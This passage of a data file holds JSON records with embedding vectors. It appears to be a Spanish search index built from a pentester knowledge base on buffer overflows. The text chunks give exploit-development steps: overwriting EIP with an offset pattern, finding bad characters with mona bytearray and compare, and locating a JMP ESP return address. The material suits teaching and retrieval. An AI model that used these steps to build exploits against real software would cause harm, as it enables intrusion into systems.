-0.00573, -0.08521, 0.02866, -0.058, 0.03323, -0.01089, 0.03852, 0.02278, 0.09227, -0.04677, -0.05564, 0.02395, -0.04898, -0.04236, -0.04256, 0.03294, -0.03452, 0.05277, -0.08745, -0.05253, -0.00924, 0.00571, 0.03425, -0.02309, 0.02307, 0.00529, 0.03014, 0.02718, -0.02277, 0.04853, 0.06969, -0.02133, -0.0105, -0.13218, -0.01528, -0.04575, 0.05231, -0.00626, -0.01688, 0.01775, -0.0357, 0.00097, 0.0338, -0.0101, -0.01101, -0.0033, -0.00829, 0.06402, 0.01332, -0.00849, 0.02888, -0.09061, 0.01553, 0.03311, 0.04166, -0.00639, 0.02098, -0.01043, 0.02033, -0.01525, 0.02542, -0.0108, 0.00186, 0.07421, 0.00427, 0.00249, 0.02556, 0.05828, 0.03772, 0.0412, 0.02219, -0.01452, -0.02714, -0.06315, 0.02669, 0.0086, 0.00776, -0.02125, 0.08017, -0.07387, 0.0806, -0.01872, -0.00696, 0.0154, 0.01938, 0.00649, 0.01563, -0.0094, 0.03615, -0.03003, 0.00632, 0.05401, -0.02184, -0.09988, 0.01851, -0.02279, -0.02128, -0.01481, -0.06732, 0.0587, 0.02347, -0.0137, -0.06285, 0.00061, -0.04459, -0.05269, -0.02505, -0.05389, -0.03537, 0.03483, 0.08335, 0.00281, -0.03578, 0.00303]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 3. Controlar EIP β€” confirmar\nEnvΓ­a `\"A\"*offset + \"BBBB\"` β†’ en el debugger **EIP = 42424242**. Control confirmado.", "indexar": "con que puedo confirmar si una direcciΓ³n especΓ­fica se ha alcanzado durante una ejecuciΓ³n", "v": [-0.05041, 0.26888, -0.18549, 0.00479, 0.16404, 0.00528, 0.01849, 0.04799, -0.05919, -0.0648, -0.07305, 0.05048, 0.03403, -0.08012, 0.01141, 0.02407, 0.04893, 0.0755, -0.01182, 0.02457, 0.03705, -0.05895, 0.0451, -0.00948, 0.03186, -0.00157, 0.01314, 0.13429, -0.07547, -0.05325, 0.05513, 0.09137, -0.04391, -0.05099, 0.14991, 0.0604, -0.13917, 0.10023, 0.00337, 0.03316, -0.04308, -0.02396, -0.0363, -0.00364, 0.08129, -0.03773, 0.05564, 0.04, -0.0233, -0.12809, 0.10961, 0.13027, -0.1654, -0.00743, -0.10188, -0.04728, 0.04875, 0.00323, 0.05942, 0.03517, -0.01918, -0.04883, 0.05599, 0.12187, 0.1548, -0.00224, 0.06151, -0.0337, 0.03361, -0.05537, -0.00238, -0.02431, -0.08655, 0.08443, 0.00188, -0.07098, -0.00208, 0.09808, -0.00654, -0.03743, 0.03947, -0.0138, -0.08686, -0.01398, -0.07305, -0.05478, 0.00358, -0.15734, -0.00513, -0.11887, 0.05568, 0.01971, -0.11818, -0.00482, 0.01549, 0.00567, -0.02763, 0.02846, -0.01777, 0.02129, 0.01239, 0.04961, -0.04056, 0.08763, 0.00617, 0.07512, 0.00591, -0.05861, 0.00819, -0.03657, -0.0512, -0.00843, -0.04427, -0.16077, -0.03204, -0.07414, -0.06317, -0.11144, -0.01681, -0.00796, -0.08174, -0.08126, -0.00231, -0.01714, 0.03297, 0.0114, -0.08787, 0.04386, 0.01224, -0.01268, -0.06675, 0.08756, 0.03908, -0.04253, -0.02701, 0.07823, -0.02299, 0.0038, 0.07704, -0.02147, 0.07897, -0.06567, 0.00901, -0.04341, 0.03724, -0.06844, -0.0837, -0.11424, -0.02688, 0.0538, 0.04324, -0.00463, 0.04001, 0.07267, -0.09177, 0.05926, -0.01882, 0.06113, 0.07548, 0.11017, -0.03519, 0.0308, -0.08449, 0.01437, 0.04518, -0.02148, -0.05524, -0.05784, 0.04886, 0.0531, -0.14639, 0.0159, -0.07557, 0.01368, 0.01862, -0.04036, 0.01108, -0.04853, 0.01868, 0.0403, -0.05259, -0.00587, -0.03807, -0.06732, -0.03535, -0.04226, 0.00705, -0.00338, -0.02239, 0.05696, 0.019, 0.03226, 0.02899, 0.00545, -0.10589, -0.02646, -0.05482, 0.08848, 0.0089, -0.03872, -0.00918, 0.03239, -0.03474, -0.00086, 0.03451, -0.03218, -0.07697, 0.06581, -0.04461, 0.03284, 0.00454, -0.01514, 0.0398, -0.0023, -0.02363, -0.05053, 0.0615, -0.03908, 0.01836, 0.07239, -0.00701, 0.06024, 0.104, -0.06519, 0.01158, -0.02349, 0.01156, 0.00251, 0.02447, 0.08968, 0.02544, 0.0527, 0.03541, 0.01037, 0.07858, 0.01962, 0.0379, -0.03234, -0.08799, -0.03651, 0.06901, 0.05536, -0.0115, -0.05514, -0.03966, -0.02119, -0.12822, 0.03428, 0.03544, -0.08155, -0.01076, 0.07078, 0.06503, -0.01675, 0.02754, -0.02728]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 4. Badchars β€” bytes que corrompen\n```\n!mona bytearray -b \"\\x00\" # genera \\x01..\\xff", "indexar": "que programa puedo usar para generar bytes de control como el nulo", "v": [0.0324, 0.03464, -0.1273, -0.0765, -0.00775, -0.04426, -0.13233, -0.03259, -0.08557, -0.11669, -0.16038, -0.05631, -0.08484, -0.06561, -0.10568, -0.07727, -0.01814, -0.18441, 0.02549, 0.03291, 0.02101, -0.0967, 0.06736, -0.05921, 0.01811, 0.15786, 0.02863, -0.06749, -0.05284, -0.00494, -0.06369, -0.09275, 0.13724, -0.15233, -0.05912, -0.01639, 0.04518, 0.05421, 0.04407, 0.14928, 0.00256, 0.07919, -0.04143, 0.09307, 0.14938, -0.02868, 0.05883, -0.02189, 0.0074, -0.0654, 0.01255, -0.03333, -0.08359, 0.03806, 0.0058, -0.13833, -0.01376, -0.1695, -0.09973, -0.09616, -0.06218, 0.05172, 0.08546, -0.06631, -0.05655, -0.04382, 0.05035, 0.02812, -0.2, 0.11035, -0.03953, 0.10382, 0.04782, -0.04036, 0.01546, 0.05504, -0.10093, -0.05562, 0.01064, -0.04412, -0.103, -0.03812, 0.01419, 0.003, -0.14082, -0.01315, 0.03048, -0.07594, -0.07093, -0.01932, -0.00446, 0.04254, 0.05627, 0.02284, 0.07708, -0.07303, 0.05434, 0.09554, 0.02183, 0.05581, 0.09021, -0.09407, -0.05977, 0.16339, 0.07356, 0.08657, 0.13798, 0.00144, -0.04807, 0.07132, 0.00835, 0.01283, -0.02896, -0.04168, -0.0892, 0.01843, 0.01643, -0.04053, -0.00166, -0.09304, -0.0819, 0.0602, -0.01218, 0.04685, 0.07727, -0.03037, 0.00541, 0.07626, -0.05496, 0.07053, 0.02897, 0.00401, -0.02803, -0.07636, -0.07493, -0.05141, -0.05783, -0.02809, 0.06904, 0.03433, -0.01186, 0.14115, 0.02177, -0.00398, 0.07554, -0.06674, -0.0451, -0.01645, -0.03514, 0.00641, 0.06398, -0.02297, -0.02735, 0.02379, -0.11854, 0.0001, -0.00832, -0.05298, -0.03143, 0.00024, -0.05616, -0.00312, -0.04832, 0.00043, 0.06491, -0.08903, -0.05855, 0.04352, 0.03176, 0.08663, -0.05754, 0.00739, 0.04768, -0.09564, 0.01919, -0.00514, -0.05854, -0.06935, -0.0162, -0.04381, -0.01371, 0.00748, -0.0038, 0.04372, -0.02643, 0.02149, 0.03314, 0.03982, 0.02516, 0.05575, -0.0256, 0.07678, 0.06621, 0.00679, 0.00651, -0.04313, 0.01325, 0.05127, 0.01647, -0.00708, 0.00125, 0.01383, 0.00795, 0.02581, 0.06565, 0.04508, -0.01902, 0.01636, 0.0223, 0.05601, 0.00072, -0.04441, -0.02138, 0.0425, -0.05344, -0.00568, -0.01071, 0.04821, 0.04043, -0.03225, 0.04471, -0.00677, 0.04126, 0.04013, 0.00381, -0.08913, 0.02715, 0.03276, -0.00111, 0.03095, 0.00853, -0.03234, -0.02427, 0.01218, 0.04747, -0.00348, 0.02535, -0.01479, -0.01103, -0.06157, -0.01833, 0.08603, -0.0187, -0.06294, -0.02755, -0.01859, -0.09369, 0.03037, -0.02813, -0.01063, -0.02342, 0.02159, 0.03105, -0.03357, -0.00696, 0.0432]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 4. Badchars β€” bytes que corrompen\n```\n!mona bytearray -b \"\\x00\" # genera \\x01..\\xff", "indexar": "hay alguna herramienta libre para crear una lista de bytes no imprimibles", "v": [-0.03085, 0.04982, -0.11561, -0.05168, -0.05646, -0.16121, -0.13441, -0.00428, -0.1225, -0.18922, -0.1136, -0.07497, 0.0303, -0.07322, 0.10948, -0.02642, -0.01453, -0.15265, 0.04502, -0.04509, -0.00177, 0.05389, -0.14771, 0.01906, -0.06495, -0.07428, 0.0183, -0.017, -0.25744, 0.11545, -0.04284, -0.01242, 0.02026, -0.07985, -0.01612, -0.05876, 0.06324, 0.07151, -0.03359, 0.02458, 0.0267, 0.09497, -0.07049, 0.16685, -0.04075, -0.06275, -0.03331, 0.07764, -0.00813, 0.00862, 0.02417, -0.11721, -0.11646, -0.00469, 0.02737, -0.19648, 0.09695, -0.16443, -0.1217, -0.11974, -0.14096, 0.06778, -0.0226, -0.1583, -0.0389, 0.00088, 0.05874, 0.00884, -0.10534, 0.15575, 0.02531, -0.02807, 0.04891, -0.0324, 0.00297, 0.04585, -0.05824, -0.04836, -0.05075, 0.03971, -0.00565, -0.06438, -0.06489, -0.06312, -0.04426, -0.09745, 0.07025, 0.00239, 0.00116, 0.03603, 0.0357, 0.06755, -0.04872, 0.08045, 0.09595, -0.02612, 0.03303, 0.08467, 0.0356, 0.04953, 0.10258, -0.04555, -0.09651, 0.05531, 0.0263, 0.01652, 0.0108, 0.04026, -0.08452, 0.02504, 0.08559, 0.03131, 0.07196, 0.02166, -0.06235, -0.01372, -0.00455, -0.00554, -0.01064, -0.03518, 0.01617, 0.01548, -0.1225, -0.00186, -0.0267, 0.03031, -0.04292, 0.06843, -0.09607, -0.04955, 0.03917, -0.01653, -0.12499, -0.08065, -0.02862, -0.01394, 0.00032, -0.08265, 0.0128, -0.08093, -0.00942, 0.04028, -0.05724, -0.03174, -0.01536, 0.01669, 0.02341, 0.03198, -0.10511, 0.03731, 0.03386, 0.00258, 0.012, 0.02592, -0.05079, 0.07363, -0.00815, -0.00848, -0.04725, -0.01115, -0.0407, -0.00471, 0.00864, -0.01492, -0.00301, -0.062, 0.01181, 0.09148, 0.06509, 0.04621, -0.02975, -0.00907, 0.11014, -0.09362, 0.01349, -0.05043, -0.04781, 0.00251, -0.01421, -0.0638, 0.01916, 0.01022, -0.03049, -0.0625, -0.03763, -0.07316, 0.06116, -0.02468, -0.00478, 0.04793, -0.0301, 0.08025, 0.00716, -0.00022, 0.0891, 0.00654, 0.02118, -0.01396, 0.03353, -0.03075, -0.03782, -0.02531, -0.0274, 0.01244, -0.00655, 0.03945, 0.00433, -0.00941, 0.01519, 0.02259, 0.05915, 0.04475, -0.04055, 0.00697, -0.03576, -0.01499, 0.01488, 0.05304, 0.02301, -0.01972, 0.056, 0.00956, 0.06274, -0.00704, 0.00314, 0.0316, 0.01263, 0.02203, -0.01568, 0.01405, 0.04902, -0.04147, 0.00182, -0.02574, 0.01436, -0.05154, 0.04908, -0.0045, -0.03849, 0.00953, 0.00419, 0.055, -0.03758, -0.02217, -0.04018, -0.03384, 0.00956, -0.0381, -0.03443, -0.091, -0.04264, -0.01782, 0.04806, -0.0589, 0.02047, -0.01859]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# envΓ­as offset + \"BBBB\" + bytearray, y comparas en memoria (ESP):\n!mona compare -f C:\\mona\\app\\bytearray.bin -a \n```\nQuita los corruptos (tΓ­pico: `\\x00`, a veces `\\x0a \\x0d`) y repite hasta \"unmodified\".", "indexar": "ΒΏcon quΓ© puedo comparar dos archivos en memoria para verificar si estΓ‘n modificados?", "v": [0.08849, 0.23123, -0.06116, -0.02143, 0.00247, -0.0314, 0.03876, 0.0414, -0.17437, -0.18363, -0.06624, -0.06346, 0.02771, -0.01595, 0.08328, 0.04263, 0.11053, -0.01209, 0.06494, 0.00397, 0.12453, -0.16307, 0.04087, -0.06615, -0.08576, 0.04095, -0.10646, 0.06674, -0.08096, -0.06605, 0.00133, 0.01046, 0.08112, 0.03637, -0.1325, 0.16411, 0.15191, 0.05139, 0.03779, 0.05594, 0.05394, 0.06936, 0.00487, -0.00892, 0.01143, -0.1236, -0.05705, 0.0181, 0.0028, -0.03932, -0.01112, 0.1146, 0.00448, 0.08937, 0.00435, -0.08105, -0.02813, -0.0322, 0.12863, -0.07971, -0.02415, 0.0418, 0.0259, 0.0652, 0.01687, 0.06066, -0.03674, 0.02972, -0.04721, 0.09044, -0.10556, 0.02602, 0.01841, -0.05068, -0.11817, 0.03166, 0.15341, -0.0605, 0.02714, 0.0588, -0.01311, 0.02419, -0.01849, 0.00094, 0.00238, 0.06516, -0.10248, -0.0359, 0.01606, -0.07691, 0.03084, 0.07612, 0.03647, 0.14278, 0.06067, 0.03526, 0.03043, 0.03554, 0.02296, 0.12797, 0.00339, -0.03519, 0.00617, 0.12244, -0.0196, 0.06892, -0.06271, 0.04521, -0.06354, -0.13303, 0.11086, -0.02439, -0.10723, 0.07141, -0.09777, 0.06786, 0.00367, -0.02842, 0.01553, -0.05559, 0.03229, 0.02366, -0.07542, -0.02206, -0.01343, 0.04417, 0.01744, 0.10996, -0.08054, 0.1454, 0.05238, 0.10254, -0.02996, -0.16127, -0.05827, 0.04117, 0.00029, 0.03875, 0.0326, 0.01301, 0.06101, 0.06075, -0.0061, 0.03552, 0.01758, 0.03952, 0.00362, 0.04434, -0.11896, -0.02545, -0.00433, -0.0544, 0.06141, 0.04731, 0.00464, 0.07209, -0.00239, -0.12595, -0.04284, 0.00896, -0.11465, -0.01278, -0.03136, -0.05712, 0.01998, -0.04857, -0.02043, 0.03853, 0.09837, -0.01249, 0.00107, -0.053, -0.06583, -0.03481, -0.00247, -0.00666, -0.04498, -0.01685, 0.0393, -0.02121, -0.028, 0.01591, -0.06489, -0.00177, -0.02724, -0.0705, 0.09384, 0.02257, 0.0226, 0.00186, 0.02311, 0.007, 0.12035, -0.01686, 0.02885, -0.07315, -0.01446, 0.02717, -0.0114, 0.03315, -0.03902, 0.00529, -0.08691, -0.00357, 0.04524, 0.04528, -0.02786, 0.01931, 0.0396, -0.03476, -0.01998, -0.02643, 0.06966, -0.0305, -0.06185, -0.04087, -0.01533, 0.02364, -0.03116, -0.0555, 0.01487, 0.03202, 0.04845, 0.00031, -0.05804, 0.03042, -0.00913, 0.02186, -0.02497, 0.00619, -0.00017, 0.05566, -0.04271, -0.0148, 0.0768, 0.00827, -0.01119, -0.00099, -0.00133, -0.00604, 0.02283, 0.05777, -0.06957, 0.01489, -0.06652, -0.02469, -0.05282, -0.0177, 0.05987, -0.01962, -0.02607, 0.02627, 0.00479, -0.01801, 0.04118, -0.01988]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# envΓ­as offset + \"BBBB\" + bytearray, y comparas en memoria (ESP):\n!mona compare -f C:\\mona\\app\\bytearray.bin -a \n```\nQuita los corruptos (tΓ­pico: `\\x00`, a veces `\\x0a \\x0d`) y repite hasta \"unmodified\".", "indexar": "ΒΏquΓ© herramienta sirve para detectar bytes corruptos como nulos o saltos de lΓ­nea dentro del sistema?", "v": [0.16301, -0.00728, -0.10166, -0.10349, 0.02185, -0.19956, -0.14147, -0.0574, 0.00878, -0.01429, -0.11166, -0.08357, -0.12848, -0.01507, 0.14482, -0.02312, -0.02276, -0.10062, -0.00313, -0.13033, -0.07359, -0.178, 0.05664, -0.05912, -0.09367, -0.01178, 0.01489, 0.01582, -0.15951, -0.00904, -0.08151, -0.03638, 0.10781, -0.04001, -0.01929, -0.11201, -0.03078, 0.01474, 0.02074, 0.1392, 0.09917, 0.07544, 0.01937, -0.04109, 0.09797, -0.11358, -0.07452, 0.03155, 0.02848, 0.02267, -0.01491, -0.09157, -0.10967, -0.02391, -0.08314, -0.19061, 0.107, 0.01669, 0.05581, -0.16618, -0.07215, -0.00962, 0.11985, -0.03665, -0.03214, -0.06423, -0.00643, -0.1045, -0.16298, 0.05032, 0.07025, 0.03948, 0.06525, 0.09155, 0.03013, 0.02998, 0.01114, -0.08584, 0.05185, 0.00702, 0.00555, 0.00873, -0.02723, 0.06042, -0.04478, -0.05836, -0.01459, 0.00873, 0.01831, -0.01788, 0.04379, 0.09859, 0.0612, 0.00741, 0.00644, -0.03314, 0.07017, 0.02534, -0.00523, 0.02896, 0.0159, -0.05845, -0.15184, 0.1162, -0.04411, 0.05232, -0.01014, 0.02479, -0.0113, -0.02055, 0.02313, 0.02106, 0.02975, -0.03233, 0.00752, 0.03956, 0.07207, 0.01189, -0.14334, 0.0026, -0.06437, 0.02049, -0.12116, -0.06121, 0.04998, -0.11488, -0.01453, 0.04881, 0.06303, 0.02239, 0.01768, 0.06154, -0.06049, -0.01319, -0.02394, -0.07561, 0.03293, -0.01394, 0.04111, -0.02692, 0.02306, 0.04979, -0.02188, -0.08813, 0.02708, 0.0434, 0.08579, -0.07298, -0.05327, -0.05102, 0.06446, 0.0031, -0.12951, 0.02897, -0.04039, -0.08972, 0.0073, -0.05627, -0.16897, 0.03374, -0.06134, -0.05054, 0.09511, 0.06132, -0.02844, -0.03201, 0.00473, 0.01559, 0.02108, 0.00588, -0.00168, -0.00451, 0.00937, -0.09794, 0.03611, 0.00347, -0.06457, -0.02921, 0.02954, -0.02833, -0.04082, -0.00481, 0.01012, -0.0394, 0.01086, 0.00167, -0.01463, 0.00023, 0.00832, 0.02605, 0.08112, -0.01394, -0.0461, 0.02085, -0.0055, -0.00114, -0.00526, -0.04963, 0.0576, -0.00429, -0.04552, 0.01851, 0.01745, 0.02634, 0.02851, 0.03137, 0.04874, -0.03675, -0.00306, 0.05663, 0.02108, -0.02334, 0.06204, -0.05096, -0.03322, -0.00311, -0.02004, 0.05058, -0.04978, -0.04139, 0.00716, -0.01057, 0.08375, 0.01964, 0.01131, -0.00074, -0.01712, 0.04541, 0.0215, -0.02206, 0.02677, -0.07252, -0.03777, -0.01285, -0.01198, -0.08758, 0.00764, -0.0144, -0.07055, -0.06943, 0.00296, 0.03987, -0.01648, -0.06397, 0.02594, -0.03539, -0.00059, -0.01063, 0.01189, -0.08408, -0.0494, -0.00088, 0.03803, -0.05817, 0.00175, 0.02718]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# envΓ­as offset + \"BBBB\" + bytearray, y comparas en memoria (ESP):\n!mona compare -f C:\\mona\\app\\bytearray.bin -a \n```\nQuita los corruptos (tΓ­pico: `\\x00`, a veces `\\x0a \\x0d`) y repite hasta \"unmodified\".", "indexar": "cual es una alternativa libre a mona compare?", "v": [-0.03241, 0.11902, -0.13288, 0.19197, -0.12403, -0.02009, -0.06691, -0.02935, -0.26451, -0.12567, -0.03488, -0.16903, -0.01853, 0.05213, 0.04241, -0.00558, 0.06527, -0.07207, 0.10329, 0.01699, -0.03044, -0.09394, -0.0459, -0.1254, -0.00955, -0.03767, -0.00732, 0.0079, 0.01747, -0.07632, 0.04275, -0.08632, 0.04839, 0.04014, -0.0789, -0.02827, 0.14252, 0.02537, 0.05874, -0.08302, 0.00403, -0.06898, -0.05149, 0.05796, -0.05085, -0.08886, -0.10246, 0.16993, -0.01626, 0.12984, -0.07755, 0.07019, -0.01354, 0.02601, 0.13608, -0.04571, 0.14041, -0.00182, -0.0353, 0.06816, -0.09292, 0.05079, 0.00041, -0.06436, 0.03106, 0.03864, -0.07417, -0.0481, -0.07617, 0.03302, 0.05329, -0.07803, -0.11702, -0.00756, -0.16842, 0.01671, 0.05316, -0.02428, -0.0136, 0.02794, 0.03365, -0.07916, -0.01163, 0.11136, -0.0571, -0.0481, 0.07938, -0.06796, -0.00703, 0.0321, 0.10465, 0.05667, -0.00809, 0.0935, 0.0102, -0.04772, 0.03757, 0.04465, 0.02033, 0.0325, 0.04874, 0.03282, -0.07142, -0.0034, 0.04713, 0.01536, -0.04998, 0.03839, -0.11709, -0.01397, 0.02326, -0.02854, -0.01763, 0.03691, -0.01064, -0.05995, -0.1506, 0.05524, 0.00285, -0.03165, -0.01539, -0.04533, -0.05034, -0.10864, 0.02655, 0.03661, 0.06033, 0.06451, -0.05584, 0.09666, 0.04761, 0.04709, -0.09406, -0.12167, -0.09273, -0.02541, 0.10766, -0.00771, 0.08678, 0.00608, -0.02367, 0.06152, -0.00638, -0.02894, 0.05247, -0.02579, -0.01449, -0.06576, 0.01357, 0.004, -0.09435, 0.03992, -0.03215, 0.10224, -0.08921, 0.06844, -0.00237, -0.03453, -0.06517, 0.05729, 0.06481, -0.05123, 0.05617, 0.00802, -0.00697, -0.02516, 0.00471, -0.06265, -0.07664, -0.03864, 0.00767, 0.05035, -0.01195, -0.05628, 0.02877, -0.06085, 0.01161, -0.10308, -0.00847, -0.05184, 0.01655, 0.0434, -0.08821, 0.00214, -0.00224, -0.06056, -0.00725, -0.0048, 0.03765, 0.04014, -0.04908, 0.03224, -0.06983, -0.06907, 0.01915, 0.01098, 0.04946, -0.0715, 0.01031, 0.00175, -0.03715, -0.03258, -0.02816, -0.05252, 0.0071, 0.0541, -0.01283, 0.06518, 0.02974, 0.04683, 0.0642, 0.02771, 0.07711, 0.02332, -0.05886, -0.01415, 0.02993, -0.06752, -0.02502, -0.06817, 0.03017, 0.04162, -0.00525, -0.00581, 0.00406, 0.05078, 0.06101, 0.03476, 0.0253, 0.0108, -0.02563, -0.00626, 0.02963, 0.01661, 0.03064, 0.04347, -0.00072, 0.03489, 0.02726, -0.03639, 0.06465, 0.05927, -0.00861, 0.02458, -0.02537, 0.01178, -0.1039, -0.00758, -0.01063, -0.02753, -0.0674, 0.01611, 0.05886, 0.01367, 0.02227, 0.00838]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 5. JMP ESP β€” la direcciΓ³n de retorno\n```\n!mona jmp -r esp -cpb \"\\x00\\x0a\\x0d\" # busca un JMP ESP sin badchars", "indexar": "que herramienta sirve para generar instrucciones de salto a la direcciΓ³n de retorno en exploits?", "v": [0.06255, 0.06268, -0.32057, -0.2555, -0.00935, -0.12205, -0.10936, -0.0204, 0.05351, -0.0498, -0.07334, -0.16629, -0.04939, -0.00699, 0.01382, -0.03701, 0.07615, -0.07011, -0.06698, -0.07856, -0.04691, 0.0521, 0.07421, -0.07029, -0.08563, 0.04584, 0.00918, -0.01929, -0.17851, 0.03659, -0.02098, 0.05896, -0.00572, -0.12777, 0.00544, -0.07762, -0.036, -0.0329, 0.04481, 0.13672, -0.1285, -0.01796, -0.12597, 0.00296, 0.05519, -0.0148, 0.04027, 0.00365, 0.05158, 0.02732, 0.04541, -0.14877, -0.05188, -0.046, -0.08457, -0.04869, 0.08253, -0.07365, -0.07558, -0.08543, -0.02499, -0.13429, 0.00839, 0.09227, -0.05462, -0.06663, -0.00269, -0.10353, -0.14536, 0.07219, -0.02723, 0.04522, -0.02779, 0.08276, -0.04489, -0.07197, 0.00926, 0.07033, 0.01984, 0.03046, -0.02591, 0.00326, -0.06001, -0.05706, -0.06498, -0.09881, 0.02893, -0.01264, 0.07654, -0.12827, -0.05782, -0.00762, -0.03549, -0.0968, -0.00896, -0.01402, 0.01882, 0.00619, 0.00368, 0.09845, 0.03406, -0.06418, -0.01276, 0.09591, 0.00375, 0.11841, 0.00836, -0.04227, -0.13328, -0.00816, 0.01698, 0.00558, -0.00069, -0.03552, 0.0017, 0.01727, -0.09018, -0.08907, -0.00762, -0.02452, -0.03699, -0.04282, -0.0167, 0.0241, -0.00628, 0.00104, 0.00236, 0.03673, 0.04804, -0.05544, -0.00411, -0.00116, 0.03152, 0.03001, 0.05612, -0.08365, 0.0753, 0.03584, 0.01681, -0.08227, 0.11486, 0.04395, 0.00748, -0.16428, -0.06258, 0.00141, 0.0573, -0.07952, -0.02391, 0.00134, -0.0194, -0.03321, -0.05848, 0.01602, 0.01264, -0.03332, -0.03412, -0.00025, -0.097, 0.12071, -0.05047, -0.0095, 0.07263, 0.01985, 0.01104, -0.03642, 0.00354, -0.01788, 0.00779, 0.06583, -0.11092, 0.05819, 0.04131, -0.03507, 0.07565, -0.07742, -0.0829, -0.01877, -0.02206, -0.01756, 0.0284, -0.03039, -0.02876, 9e-05, 0.04541, -0.08805, 0.03589, -0.03646, 0.02786, 0.06748, -0.01107, -0.01386, 0.00985, -0.04756, -0.0465, -0.01688, -0.02468, 0.04955, 0.02281, -0.0147, 0.00538, 0.01027, -0.02864, -0.01114, 0.10548, 0.02016, -0.02635, 0.00023, -0.07767, 0.03298, 0.02915, -0.00524, 0.06584, -0.00381, -0.07362, -0.01377, 0.02118, -0.00691, -0.0898, -0.01621, 0.01653, 0.01637, 0.06668, 0.00403, -0.01586, 0.00777, -0.00909, -0.03375, -0.03898, 0.00369, -0.00983, -0.01763, -0.00553, 0.04931, -0.02171, -0.07442, 0.03602, 0.00936, -0.03743, -0.03692, -0.08091, 0.05556, 0.01217, -0.02824, -0.03855, -0.01756, 0.01373, 0.03274, 0.00929, -0.04753, -0.0123, -0.02382, 0.01075, -0.0274, 0.00242, -0.05311]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 5. JMP ESP β€” la direcciΓ³n de retorno\n```\n!mona jmp -r esp -cpb \"\\x00\\x0a\\x0d\" # busca un JMP ESP sin badchars", "indexar": "cual programa me ayuda a crear saltos JMP ESP evitando caracteres malos?", "v": [0.12864, 0.04792, -0.0775, -0.12648, -0.18961, -0.13571, 0.00383, -0.11644, -0.14955, -0.06005, -0.05791, 0.05642, 0.03175, -0.04307, 0.08775, 3e-05, 0.16731, 0.07385, 0.00971, 0.00802, -0.02793, -0.09494, -0.04586, -0.14905, -0.05453, 0.01392, -0.1195, 0.11496, -0.07844, 0.00144, 0.01352, 0.14139, -0.04979, -0.05607, 0.13029, 0.01038, 0.09403, -0.01144, -0.08365, 0.13285, 0.02732, -0.06528, 0.04301, -0.09047, -0.00555, 0.00349, 0.05212, 0.10477, 0.02255, -0.0148, 0.03466, 0.0727, -0.01149, -0.10709, -0.02108, -0.09561, 0.10227, -0.06376, -0.1239, -0.02337, 0.02764, 0.01709, 0.03331, 0.00962, 0.01964, -0.13729, 0.09453, -0.13919, -0.16835, 0.05624, 0.00497, 0.018, 0.01071, -0.04668, 0.05599, -0.01811, -0.03637, -0.10674, 0.13966, -0.06412, -0.05507, -0.02834, 0.03375, 0.07622, -0.02839, -0.08632, -0.15015, -0.00825, 0.016, -0.00567, 0.08751, -0.00587, 0.08115, 0.00076, -0.02557, -0.05106, 0.15413, 0.06216, 0.03355, 0.07376, -0.02591, 0.01561, -0.13135, 0.03188, 0.01134, 0.00839, 0.08922, -0.0613, -0.07648, -4e-05, 0.02534, 0.03658, 0.03076, -0.08206, -0.00178, -0.05942, -0.03668, -0.02092, -0.01167, -0.0602, -0.05355, 0.02609, -0.08727, -0.03934, 0.01668, 0.02075, 0.03252, 0.04041, 0.02632, 0.1134, -0.08129, 0.02287, -0.03407, -0.05185, -0.02999, -0.01983, 0.09654, 0.09822, 0.01177, -0.00206, 0.00697, 0.0182, 0.00956, -0.07043, -0.00176, 0.05359, 0.04229, -0.07531, -0.00815, 0.05711, 0.08306, 0.0266, -0.06193, 0.07724, -0.01439, -0.08352, 0.01459, -0.0573, -0.09358, 0.12221, -0.05806, 0.11678, 0.01366, -0.02243, 0.01275, -0.03079, 0.01709, -0.00839, 0.0613, 0.03566, -0.0809, 0.00159, -0.00144, -0.02353, 0.00356, 0.00823, -0.04375, -0.02725, 0.00962, 0.00869, -0.07497, -0.01001, 0.01074, -0.03901, -0.02034, -0.10503, 0.0046, 0.04207, 0.0187, -0.06313, 0.00421, 0.03257, -0.0438, -0.02596, -0.0621, -0.02526, -0.05429, -0.0598, 0.01561, -0.04144, -0.04669, -0.00013, -0.01018, -0.04928, 0.09988, 0.04683, -0.02937, -0.00377, 0.00455, 0.09271, 0.04091, -0.04003, 0.06831, -0.03199, -0.02276, -0.0213, 0.00252, 0.02275, 0.01663, -0.04628, 0.02012, -3e-05, 0.06626, 0.03892, 0.02525, -0.03086, 0.05474, -0.00335, -0.04106, 0.07355, -0.07253, -0.05401, 0.05064, -0.03404, 0.0237, -0.00906, 0.01032, -0.00085, -0.00931, -0.05688, 0.01086, 0.03341, -0.02684, -0.04007, 0.00175, 0.02829, -0.04169, 0.08134, -0.01662, -0.02094, 0.03451, 0.06857, 0.0397, -0.05111, 0.04359, -0.00681]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 5. JMP ESP β€” la direcciΓ³n de 